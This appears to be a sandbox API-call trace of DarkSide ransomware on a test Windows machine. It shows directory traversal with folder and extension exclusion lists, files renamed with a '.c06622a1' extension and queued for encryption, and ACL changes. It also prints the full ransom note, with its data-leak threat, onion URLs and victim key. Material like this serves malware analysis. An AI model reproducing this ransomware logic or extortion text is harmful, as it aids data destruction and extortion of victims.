[0155.449] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0155.449] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0155.449] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0155.449] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 0x2a [0155.449] wcscpy (in: _Dest=0x44d00ce, _Source="z-m538Ne.png" | out: _Dest="z-m538Ne.png") returned="z-m538Ne.png" [0155.450] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\z-m538Ne.png", dwFileAttributes=0x80) returned 1 [0155.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\z-m538Ne.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\z-m538ne.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0155.450] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.450] ReadFile (in: hFile=0x1a8, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0155.451] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x6c53dc91 [0155.451] RtlComputeCrc32 (PartialCrc=0xdc91, Buffer=0x3feb74, Length=0x80) returned 0xc59629a3 [0155.451] RtlComputeCrc32 (PartialCrc=0x29a3, Buffer=0x3feb74, Length=0x80) returned 0xf8311d75 [0155.451] RtlComputeCrc32 (PartialCrc=0x1d75, Buffer=0x3feb74, Length=0x80) returned 0xa68abae5 [0155.451] RtlComputeCrc32 (PartialCrc=0xbae5, Buffer=0x3feb74, Length=0x80) returned 0x48e911ea [0155.451] CloseHandle (hObject=0x1a8) returned 1 [0155.451] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0155.451] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\z-m538Ne.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\z-m538Ne.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\z-m538Ne.png" [0155.451] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\z-m538Ne.png") returned 0x37 [0155.451] wcscpy (in: _Dest=0x44e00ee, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.451] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\z-m538Ne.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\z-m538ne.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\z-m538Ne.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\z-m538ne.png.c06622a1"), dwFlags=0x8) returned 1 [0155.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\z-m538Ne.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\z-m538ne.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0155.453] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.453] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0155.458] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6b676995 [0155.458] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x76e7adcc [0155.458] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2196ad34 [0155.459] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3f3edd8d [0155.459] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x74adc899 [0155.459] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7d37fb58 [0155.459] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x400416a [0155.459] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x23b5c75b [0155.462] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0xf1e57d59 [0155.462] RtlComputeCrc32 (PartialCrc=0x7d59, Buffer=0x4670094, Length=0x80) returned 0x9ac72e89 [0155.462] RtlComputeCrc32 (PartialCrc=0x2e89, Buffer=0x4670094, Length=0x80) returned 0xec4b9164 [0155.462] RtlComputeCrc32 (PartialCrc=0x9164, Buffer=0x4670094, Length=0x80) returned 0xa72ac4c9 [0155.462] RtlComputeCrc32 (PartialCrc=0xc4c9, Buffer=0x4670094, Length=0x80) returned 0x7a15ceb8 [0155.462] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0155.462] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0155.462] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0155.462] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x438fde80, ftCreationTime.dwHighDateTime=0x1d5d954, ftLastAccessTime.dwLowDateTime=0xb24b0be0, ftLastAccessTime.dwHighDateTime=0x1d5e0db, ftLastWriteTime.dwLowDateTime=0xb24b0be0, ftLastWriteTime.dwHighDateTime=0x1d5e0db, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_nLNF", cAlternateFileName="")) returned 1 [0155.462] _wcsicmp (_Str1="$recycle.bin", _Str2="_nLNF") returned -59 [0155.462] wcslen (_String="$recycle.bin") returned 0xc [0155.462] _wcsicmp (_Str1="config.msi", _Str2="_nLNF") returned 4 [0155.462] wcslen (_String="config.msi") returned 0xa [0155.462] _wcsicmp (_Str1="$windows.~bt", _Str2="_nLNF") returned -59 [0155.462] wcslen (_String="$windows.~bt") returned 0xc [0155.462] _wcsicmp (_Str1="$windows.~ws", _Str2="_nLNF") returned -59 [0155.462] wcslen (_String="$windows.~ws") returned 0xc [0155.462] _wcsicmp (_Str1="windows", _Str2="_nLNF") returned 24 [0155.462] wcslen (_String="windows") returned 0x7 [0155.462] _wcsicmp (_Str1="appdata", _Str2="_nLNF") returned 2 [0155.462] wcslen (_String="appdata") returned 0x7 [0155.462] _wcsicmp (_Str1="application data", _Str2="_nLNF") returned 2 [0155.462] wcslen (_String="application data") returned 0x10 [0155.462] _wcsicmp (_Str1="boot", _Str2="_nLNF") returned 3 [0155.462] wcslen (_String="boot") returned 0x4 [0155.462] _wcsicmp (_Str1="google", _Str2="_nLNF") returned 8 [0155.462] wcslen (_String="google") returned 0x6 [0155.462] _wcsicmp (_Str1="mozilla", _Str2="_nLNF") returned 14 [0155.462] wcslen (_String="mozilla") returned 0x7 [0155.463] _wcsicmp (_Str1="program files", _Str2="_nLNF") returned 17 [0155.463] wcslen (_String="program files") returned 0xd [0155.463] _wcsicmp (_Str1="program files (x86)", _Str2="_nLNF") returned 17 [0155.463] wcslen (_String="program files (x86)") returned 0x13 [0155.463] _wcsicmp (_Str1="programdata", _Str2="_nLNF") returned 17 [0155.463] wcslen (_String="programdata") returned 0xb [0155.463] _wcsicmp (_Str1="system volume information", _Str2="_nLNF") returned 20 [0155.463] wcslen (_String="system volume information") returned 0x19 [0155.463] _wcsicmp (_Str1="tor browser", _Str2="_nLNF") returned 21 [0155.463] wcslen (_String="tor browser") returned 0xb [0155.463] _wcsicmp (_Str1="windows.old", _Str2="_nLNF") returned 24 [0155.463] wcslen (_String="windows.old") returned 0xb [0155.463] _wcsicmp (_Str1="intel", _Str2="_nLNF") returned 10 [0155.463] wcslen (_String="intel") returned 0x5 [0155.463] _wcsicmp (_Str1="msocache", _Str2="_nLNF") returned 14 [0155.463] wcslen (_String="msocache") returned 0x8 [0155.463] _wcsicmp (_Str1="perflogs", _Str2="_nLNF") returned 17 [0155.463] wcslen (_String="perflogs") returned 0x8 [0155.463] _wcsicmp (_Str1="x64dbg", _Str2="_nLNF") returned 25 [0155.463] wcslen (_String="x64dbg") returned 0x6 [0155.463] _wcsicmp (_Str1="public", _Str2="_nLNF") returned 17 [0155.463] wcslen (_String="public") returned 0x6 [0155.463] _wcsicmp (_Str1="all users", _Str2="_nLNF") returned 2 [0155.463] wcslen (_String="all users") returned 0x9 [0155.463] _wcsicmp (_Str1="default", _Str2="_nLNF") returned 5 [0155.463] wcslen (_String="default") returned 0x7 [0155.463] wcscpy (in: _Dest=0x44b0068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*" [0155.463] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned 0x2c [0155.463] wcscpy (in: _Dest=0x44b00be, _Source="_nLNF" | out: _Dest="_nLNF") returned="_nLNF" [0155.463] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0155.463] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0155.464] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" [0155.464] GetNamedSecurityInfoW () returned 0x0 [0155.465] SetEntriesInAclW () returned 0x0 [0155.465] SetNamedSecurityInfoW () returned 0x0 [0155.481] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d582d8) returned 1 [0155.481] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe83c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0155.481] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf")) returned 1 [0155.481] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0155.481] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x678 [0155.482] WriteFile (in: hFile=0x678, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe80c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe80c*=0xa8f, lpOverlapped=0x0) returned 1 [0155.483] CloseHandle (hObject=0x678) returned 1 [0155.483] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0155.483] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf")) returned 0x10 [0155.483] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\") returned="" [0155.483] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\") returned 0x31 [0155.483] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0155.483] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x438fde80, ftCreationTime.dwHighDateTime=0x1d5d954, ftLastAccessTime.dwLowDateTime=0xdb494e20, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdb494e20, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.484] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2164f20, ftCreationTime.dwHighDateTime=0x1d5e011, ftLastAccessTime.dwLowDateTime=0x71a86bb0, ftLastAccessTime.dwHighDateTime=0x1d5d81a, ftLastWriteTime.dwLowDateTime=0x71a86bb0, ftLastWriteTime.dwHighDateTime=0x1d5d81a, nFileSizeHigh=0x0, nFileSizeLow=0xff1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="0O88q71.png", cAlternateFileName="")) returned 1 [0155.484] _wcsicmp (_Str1="0O88q71.png", _Str2="README.c06622a1.TXT") returned -66 [0155.484] wcsstr (_Str="0O88q71.png", _SubStr="README") returned 0x0 [0155.484] _wcsicmp (_Str1="autorun.inf", _Str2="0O88q71.png") returned 49 [0155.484] wcslen (_String="autorun.inf") returned 0xb [0155.484] _wcsicmp (_Str1="boot.ini", _Str2="0O88q71.png") returned 50 [0155.484] wcslen (_String="boot.ini") returned 0x8 [0155.484] _wcsicmp (_Str1="bootfont.bin", _Str2="0O88q71.png") returned 50 [0155.484] wcslen (_String="bootfont.bin") returned 0xc [0155.484] _wcsicmp (_Str1="bootsect.bak", _Str2="0O88q71.png") returned 50 [0155.484] wcslen (_String="bootsect.bak") returned 0xc [0155.484] _wcsicmp (_Str1="desktop.ini", _Str2="0O88q71.png") returned 52 [0155.485] wcslen (_String="desktop.ini") returned 0xb [0155.485] _wcsicmp (_Str1="iconcache.db", _Str2="0O88q71.png") returned 57 [0155.485] wcslen (_String="iconcache.db") returned 0xc [0155.485] _wcsicmp (_Str1="ntldr", _Str2="0O88q71.png") returned 62 [0155.485] wcslen (_String="ntldr") returned 0x5 [0155.485] _wcsicmp (_Str1="ntuser.dat", _Str2="0O88q71.png") returned 62 [0155.485] wcslen (_String="ntuser.dat") returned 0xa [0155.485] _wcsicmp (_Str1="ntuser.dat.log", _Str2="0O88q71.png") returned 62 [0155.485] wcslen (_String="ntuser.dat.log") returned 0xe [0155.485] _wcsicmp (_Str1="ntuser.ini", _Str2="0O88q71.png") returned 62 [0155.485] wcslen (_String="ntuser.ini") returned 0xa [0155.485] _wcsicmp (_Str1="thumbs.db", _Str2="0O88q71.png") returned 68 [0155.485] wcslen (_String="thumbs.db") returned 0x9 [0155.485] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0155.485] wcslen (_String="386") returned 0x3 [0155.485] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0155.485] wcslen (_String="adv") returned 0x3 [0155.485] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0155.485] wcslen (_String="ani") returned 0x3 [0155.485] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0155.485] wcslen (_String="bat") returned 0x3 [0155.485] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0155.485] wcslen (_String="bin") returned 0x3 [0155.485] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0155.485] wcslen (_String="cab") returned 0x3 [0155.485] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0155.485] wcslen (_String="cmd") returned 0x3 [0155.485] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0155.485] wcslen (_String="com") returned 0x3 [0155.485] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0155.485] wcslen (_String="cpl") returned 0x3 [0155.485] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0155.485] wcslen (_String="cur") returned 0x3 [0155.485] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0155.485] wcslen (_String="deskthemepack") returned 0xd [0155.485] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0155.485] wcslen (_String="diagcab") returned 0x7 [0155.485] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0155.485] wcslen (_String="diagcfg") returned 0x7 [0155.486] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0155.486] wcslen (_String="diagpkg") returned 0x7 [0155.486] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0155.486] wcslen (_String="dll") returned 0x3 [0155.486] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0155.486] wcslen (_String="drv") returned 0x3 [0155.486] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0155.486] wcslen (_String="exe") returned 0x3 [0155.486] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0155.486] wcslen (_String="hlp") returned 0x3 [0155.486] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0155.486] wcslen (_String="icl") returned 0x3 [0155.486] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0155.486] wcslen (_String="icns") returned 0x4 [0155.486] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0155.486] wcslen (_String="ico") returned 0x3 [0155.486] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0155.486] wcslen (_String="ics") returned 0x3 [0155.486] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0155.486] wcslen (_String="idx") returned 0x3 [0155.486] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0155.486] wcslen (_String="ldf") returned 0x3 [0155.486] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0155.486] wcslen (_String="lnk") returned 0x3 [0155.486] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0155.486] wcslen (_String="mod") returned 0x3 [0155.486] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0155.486] wcslen (_String="mpa") returned 0x3 [0155.486] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0155.486] wcslen (_String="msc") returned 0x3 [0155.486] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0155.486] wcslen (_String="msp") returned 0x3 [0155.486] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0155.486] wcslen (_String="msstyles") returned 0x8 [0155.486] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0155.486] wcslen (_String="msu") returned 0x3 [0155.486] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0155.486] wcslen (_String="nls") returned 0x3 [0155.487] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0155.487] wcslen (_String="nomedia") returned 0x7 [0155.487] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0155.487] wcslen (_String="ocx") returned 0x3 [0155.487] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0155.487] wcslen (_String="prf") returned 0x3 [0155.487] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0155.487] wcslen (_String="ps1") returned 0x3 [0155.487] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0155.487] wcslen (_String="rom") returned 0x3 [0155.487] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0155.487] wcslen (_String="rtp") returned 0x3 [0155.487] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0155.487] wcslen (_String="scr") returned 0x3 [0155.487] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0155.487] wcslen (_String="shs") returned 0x3 [0155.487] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0155.487] wcslen (_String="spl") returned 0x3 [0155.487] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0155.487] wcslen (_String="sys") returned 0x3 [0155.487] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0155.487] wcslen (_String="theme") returned 0x5 [0155.487] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0155.487] wcslen (_String="themepack") returned 0x9 [0155.487] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0155.487] wcslen (_String="wpx") returned 0x3 [0155.487] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0155.487] wcslen (_String="lock") returned 0x4 [0155.487] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0155.487] wcslen (_String="key") returned 0x3 [0155.487] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0155.487] wcslen (_String="hta") returned 0x3 [0155.487] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0155.487] wcslen (_String="msi") returned 0x3 [0155.487] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0155.487] wcslen (_String="pdb") returned 0x3 [0155.487] _wcsicmp (_Str1="sql", _Str2="png") returned 3 [0155.487] wcslen (_String="sql") returned 0x3 [0155.487] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0155.488] wcslen (_String="sqlite") returned 0x6 [0155.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf")) returned 0x10 [0155.488] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0155.488] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" [0155.488] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned 0x30 [0155.488] wcscpy (in: _Dest=0x45000f2, _Source="0O88q71.png" | out: _Dest="0O88q71.png") returned="0O88q71.png" [0155.488] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0O88q71.png", dwFileAttributes=0x80) returned 1 [0155.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0O88q71.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\0o88q71.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x658 [0155.488] SetFilePointerEx (in: hFile=0x658, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.488] ReadFile (in: hFile=0x658, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0155.489] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xb8d664c3 [0155.489] RtlComputeCrc32 (PartialCrc=0x64c3, Buffer=0x3fe8f4, Length=0x80) returned 0xaf1350ee [0155.489] RtlComputeCrc32 (PartialCrc=0x50ee, Buffer=0x3fe8f4, Length=0x80) returned 0x7cfaae6b [0155.489] RtlComputeCrc32 (PartialCrc=0xae6b, Buffer=0x3fe8f4, Length=0x80) returned 0xd0aa2318 [0155.489] RtlComputeCrc32 (PartialCrc=0x2318, Buffer=0x3fe8f4, Length=0x80) returned 0x81de0319 [0155.489] CloseHandle (hObject=0x658) returned 1 [0155.489] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0155.490] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0O88q71.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0O88q71.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0O88q71.png" [0155.490] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0O88q71.png") returned 0x3c [0155.490] wcscpy (in: _Dest=0x4510110, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.490] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0O88q71.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\0o88q71.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\0O88q71.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\0o88q71.png.c06622a1"), dwFlags=0x8) returned 1 [0155.496] 